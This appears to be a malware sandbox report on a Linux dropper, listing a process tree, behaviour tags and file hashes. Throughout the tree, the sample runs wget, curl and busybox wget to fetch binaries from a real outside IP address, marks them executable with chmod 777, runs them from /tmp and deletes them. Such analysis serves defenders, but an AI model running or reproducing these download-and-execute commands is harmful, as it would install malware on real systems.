/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:934
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:940
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:946
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:952
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:958
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:964
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:970
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97